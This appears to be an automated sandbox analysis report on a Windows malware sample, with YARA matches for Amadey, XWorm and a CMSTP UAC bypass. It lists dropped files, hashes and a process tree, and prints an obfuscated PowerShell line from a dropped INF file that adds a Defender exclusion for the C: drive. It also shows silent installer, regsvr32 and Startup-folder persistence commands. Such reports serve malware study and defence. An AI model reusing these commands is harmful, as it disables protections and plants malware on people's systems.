                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....t}g................................. ........@.. ....................................@.................................X...S................................................................................... ............... ..H............text........ ...................... ..`.rsrc..............................@..@.reloc...............Z..............@..B........................H........s..XX......$.....................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                                                            C:\Users\user\AppData\Roaming\is-VSE52.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1994010
                                                                                                                                            Entropy (8bit):7.240581605798372
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:kDfYXoYi50pMq0MI5F6E178BQh/GN8FzJ0y2f0IHii:kDfY4By7PILT178u/hzrJIHii
                                                                                                                                            MD5:48BFA0E8C3A2473A3D7E7C0B6238C22E
                                                                                                                                            SHA1:98F1E5793849E7FDE52024A45A5DB89E9B8CD811
                                                                                                                                            SHA-256:4988087CF45A09299DD128EEF754CF7DB3252313DD8D274CC5F5F327C3B34C20
                                                                                                                                            SHA-512:661D59F142D24FF096A254F52115872886514C6A5AB3B2CE2C1965AE197490F08D93D8D092B6F78A6BFFD54B59A9C8D48199C6CCAB9E7E9FEAF3DB097043D4AC
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...>Sr?.6..g.....&"...+.V...2...... ................................................N....`... ......................................@..q....P...................k..............l...............................(...................pW..0............................text....T.......V..................`..`.data........p.......Z..............@....rdata..0f.......h...f..............@..@.pdata...k.......l..................@..@.xdata..`....`.......:..............@..@.bss.........0...........................edata..q....@......................@..@.idata.......P... ..................@....CRT....`....p....... ..............@....tls................."..............@....reloc..l............$..............@..B........................................................................................................................................................................

                                                                                                                                            C:\Users\user\Sys.inf

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe
                                                                                                                                            File Type:Windows setup INFormation
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1925
                                                                                                                                            Entropy (8bit):4.832236717876804
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:O4zOtPxXo+mXdjsX/XNXyXNXb+tXNX6fXFZr+iJTO1x4FsXX6X8YXo+mXdjsX/Xy:tOBa9PBxexoa9PBxeLeeh+Ec4Cw+
                                                                                                                                            MD5:B700B34C4408FE754C25F40AB6D14AFA
                                                                                                                                            SHA1:81707E8507A95D869F6522A3FE1BBC3A3887C369
                                                                                                                                            SHA-256:82C1F68551F47D6DBEF4F05981E961786DD06018658648073A32236DCA43DEF2
                                                                                                                                            SHA-512:CE4CA698F3142E87EA00A8795D2EF4980D5C778D1D05833692E40370A9E5A20D6C76E6B3AFDEEB3C5D21495CA0CC9FE5CB825389F92CEAFC94CDE32EFD8B80F7
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:[version]..Signature=$chicago$..AdvancedINF=2.5....[DefaultInstall]..CustomDestination=CustInstDestSectionAllUsers..RunPreSetupCommands=RunPreSetupCommandsSection....[RunPreSetupCommandsSection]..powershell.exe -exec bypass "[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[char]123+[char]50+[char]125+[char]39+[char]32+[char]45+[char]102+[char]32+[char]39+[char]100+[char]45+[char]77+[char]39+[char]44+[char]39+[char]65+[char]100+[char]39+[char]44+[char]39+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]80+[char]97+[char]116+[char]104+[char]32+[char]39+[char]67+[char]58+[char]92+[char]39+[char]59+[char]46+[char]40+[char]39+[char]123+[char]49+[char]125+[char]123+[char]48+[char]125+[char]123+[char]51+[char]125+[

                                                                                                                                            C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):55
                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                            C:\Windows\Tasks\skotes.job

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):284
                                                                                                                                            Entropy (8bit):3.387525912887948
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:djtjTXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0ldQ0ut0:RFf2RKQ1CGAFAjzvYRQVfut0
                                                                                                                                            MD5:9BA14D9B1DF936DFF4C76AF024DBA490
                                                                                                                                            SHA1:2C40CEFB1A2204333FC02487ECF1924088466124
                                                                                                                                            SHA-256:94ED8D6EE8812C0566D098AF6734DC750A227902A887010694304F8F00D826BA
                                                                                                                                            SHA-512:DC83C340304855D19D1FC1F376BDA50D11419D0F4CE955E9E6F1EE165B44961FF58B6CAB0BA36939AA96F61F1B2B73406F8B90230F6B150C537FAB35A9E3CC29
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.... ..J..N...q.,..F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................,.@3P.........................

                                                                                                                                            C:\Windows\Temp\aodefromlpug.sys

                                                                                                                                            Download File
                                                                                                                                            Process:C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14544
                                                                                                                                            Entropy (8bit):6.2660301556221185
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                            Static File Info

                                                                                                                                            General

                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Entropy (8bit):6.66194464256937
                                                                                                                                            TrID:
                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                            File name:file.exe
                                                                                                                                            File size:3'198'976 bytes
                                                                                                                                            MD5:38560b590890a37ab8460092560d282c
                                                                                                                                            SHA1:2564dac98b8ed26fccaed9764f172c9123e50f2b
                                                                                                                                            SHA256:014857e05f8c8abace4ccf74a6e613a755a651d724c510dc5959bea75295f53b
                                                                                                                                            SHA512:5a5b0869092b690ac373d03916142c454d88fcb7abd26ceebe738e2df1d09416f19e0f73163050f1e45c3daba980b1714193a79cab84661277d11b455326f368
                                                                                                                                            SSDEEP:49152:0RDfGY4MzqVDFDJKt+yEVlISupM+Gr9Jcx2gKG:sbGY4M8JDJy+yEVubM+GBJc8
                                                                                                                                            TLSH:C4E529D2E5057ECFE49A1EB84437CDC2586E13E58B2148D7983868BFBE63CC126B7914
                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:90cececece8e8eb0

                                                                                                                                            Static PE Info

                                                                                                                                            General

                                                                                                                                            Entrypoint:0x70e000
                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                            Digitally signed:false
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            Subsystem:windows gui
                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                            Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                            TLS Callbacks:
                                                                                                                                            CLR (.Net) Version:
                                                                                                                                            OS Version Major:6
                                                                                                                                            OS Version Minor:0
                                                                                                                                            File Version Major:6
                                                                                                                                            File Version Minor:0
                                                                                                                                            Subsystem Version Major:6
                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                            Entrypoint Preview

                                                                                                                                            Instruction
                                                                                                                                            jmp 00007FC408DDB1CAh

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x30bbbc0x10mrenudwa
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x30bb6c0x18mrenudwa
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            0x10000x680000x6800072c56efec0aab1e3f2243d19036cfe7dFalse0.5587862454927884data7.060098617572218IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rsrc0x690000x5d40x400cd3d39f0e07a9b0255e18aab6529d24bFalse0.7080078125data5.837091489197324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            mrenudwa0x6b0000x2a20000x2a1200b4f1881417e801265245b0870a71f2eeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            qxwztaye0x30d0000x10000x6001b2f33273b69ab7a97b0154993ce089dFalse0.5390625data4.863599174609183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .taggant0x30e0000x30000x2200e8e2b0fe84a8e9f12af026ac5395e558False0.05503216911764706DOS executable (COM)0.5955219622088251IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_MANIFEST0x30bbcc0x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                            RT_MANIFEST0x30bfb00x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            kernel32.dlllstrcpy

                                                                                                                                            Possible Origin

                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            EnglishUnited States

                                                                                                                                            Network Behavior

                                                                                                                                            Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                            Statistics

                                                                                                                                            CPU Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            Memory Usage

                                                                                                                                            Click to jump to process

                                                                                                                                            High Level Behavior Distribution

                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Target ID:0
                                                                                                                                            Start time:17:43:04
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                            Imagebase:0xe50000
                                                                                                                                            File size:3'198'976 bytes
                                                                                                                                            MD5 hash:38560B590890A37AB8460092560D282C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:1
                                                                                                                                            Start time:17:43:05
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:3'198'976 bytes
                                                                                                                                            MD5 hash:38560B590890A37AB8460092560D282C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:5
                                                                                                                                            Start time:17:44:00
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:3'198'976 bytes
                                                                                                                                            MD5 hash:38560B590890A37AB8460092560D282C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:17:44:07
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe"
                                                                                                                                            Imagebase:0x60000
                                                                                                                                            File size:27'136 bytes
                                                                                                                                            MD5 hash:86268AF17C4C5AFF970734EB5775A7F8
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.3336204963.0000000002486000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            • Detection: 16%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:7
                                                                                                                                            Start time:17:44:09
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\cmstp.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.inf
                                                                                                                                            Imagebase:0xb0000
                                                                                                                                            File size:81'920 bytes
                                                                                                                                            MD5 hash:D7AABFAB5BEFD53BA3A27BD48F3CC675
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:9
                                                                                                                                            Start time:17:44:10
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe"
                                                                                                                                            Imagebase:0x110000
                                                                                                                                            File size:560'640 bytes
                                                                                                                                            MD5 hash:75C2C9D60104BA3C4271B2A629E90023
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.3318620989.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:10
                                                                                                                                            Start time:17:44:11
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                            File size:55'320 bytes
                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:11
                                                                                                                                            Start time:17:44:12
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe"
                                                                                                                                            Imagebase:0xc70000
                                                                                                                                            File size:1'863'680 bytes
                                                                                                                                            MD5 hash:89CF32E94C9A6312D70F99607678E53F
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 100%, Avira
                                                                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:12
                                                                                                                                            Start time:17:44:17
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'714'462 bytes
                                                                                                                                            MD5 hash:68D36FA633B4FB19D5C5B285C9A0B415
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Antivirus matches:
                                                                                                                                            • Detection: 3%, ReversingLabs
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:13
                                                                                                                                            Start time:17:44:17
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp" /SL5="$30528,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'181'184 bytes
                                                                                                                                            MD5 hash:BCC236A3921E1388596A42B05686FF5E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:14
                                                                                                                                            Start time:17:44:18
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
                                                                                                                                            Imagebase:0x7ff71e800000
                                                                                                                                            File size:1'714'462 bytes
                                                                                                                                            MD5 hash:68D36FA633B4FB19D5C5B285C9A0B415
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:15
                                                                                                                                            Start time:17:44:18
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp" /SL5="$20532,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:1'181'184 bytes
                                                                                                                                            MD5 hash:BCC236A3921E1388596A42B05686FF5E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:16
                                                                                                                                            Start time:17:44:19
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv"
                                                                                                                                            Imagebase:0xbc0000
                                                                                                                                            File size:20'992 bytes
                                                                                                                                            MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:17
                                                                                                                                            Start time:17:44:19
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv"
                                                                                                                                            Imagebase:0x7ff642490000
                                                                                                                                            File size:25'088 bytes
                                                                                                                                            MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:18
                                                                                                                                            Start time:17:44:19
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }"
                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                            File size:452'608 bytes
                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:true

                                                                                                                                            General

                                                                                                                                            Target ID:19
                                                                                                                                            Start time:17:44:19
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                            File size:862'208 bytes
                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Has exited:false

                                                                                                                                            General

                                                                                                                                            Target ID:20
                                                                                                                                            Start time:17:44:23
                                                                                                                                            Start date:07/01/2025
                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe"
                                                                                                                                            Imagebase:0x720000
                                                                                                                                            File size:482'304 bytes
                                                                                                                                            MD5 hash:D22612D2899FC888514C3CA553B49F79
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000014.00000000.2457478435.0000000000722000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
